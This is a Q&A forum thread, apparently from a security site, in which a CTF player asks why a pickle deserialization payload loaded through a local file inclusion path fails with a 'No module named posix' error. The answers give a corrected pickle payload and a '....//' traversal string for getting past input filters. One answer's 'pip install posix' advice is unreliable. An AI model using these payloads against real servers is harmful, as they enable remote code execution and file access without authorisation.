0

I'm trying to execute pickle shell-code through a download function on a website but I get the following error:

<html>
<h1>ERROR: Cannot load file</h1>

<!--
 Traceback (most recent call last):
  File "/opt/example/handlers/UserHandlers.py", line 134, in get
    upload = pickle.load(f)
  File "/usr/local/lib/python2.7/pickle.py", line 1384, in load
    return Unpickler(file).load()
  File "/usr/local/lib/python2.7/pickle.py", line 864, in load
    dispatch[key](self)
  File "/usr/local/lib/python2.7/pickle.py", line 1096, in load_global
    klass = self.find_class(module, name)
  File "/usr/local/lib/python2.7/pickle.py", line 1130, in find_class
    __import__(module)
ImportError: No module named posix

-->
</html>

Pickle Shellcode:

cposix
system
p1
(S'sleep 30'
p2
tRp3

I assume this is a path issue and I also can't import modules by filename. Keep in mind I'm using an LFI vulnerability to call my pickle shell-code.

Example: http://example.com/download?file=../../../pickle.txt

Could this be the cause of the issue? I should also note this is a CTF, so it should be vulnerable in one way or another. Thanks in advance!

Improve this question
1
  • This looks like more a python programing question, did you google "ImportError: No module named posix" or ask about this in stackoverflow.com? Commented Jun 25, 2019 at 11:31

2 Answers 2

Reset to default
1 
ImportError: No module named posix

Is the problem here. You can either attempt to drop to a bash shell and use

pip install posix

Or the best solution is to just remove 

import posix

and replace it with

import os
Improve this answer
0

Your shell code needs to look like so according to https://cvedetails.com/cve/CVE-2013-5093/

cposix\nsystem\np1\n(S'sleep 30'\np2\ntRp3.

Also try padding your directory traversal attack with additional characters to account for input sanitation.

http://example.com/download?file=....//....//....//pickle.txt

Improve this answer

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.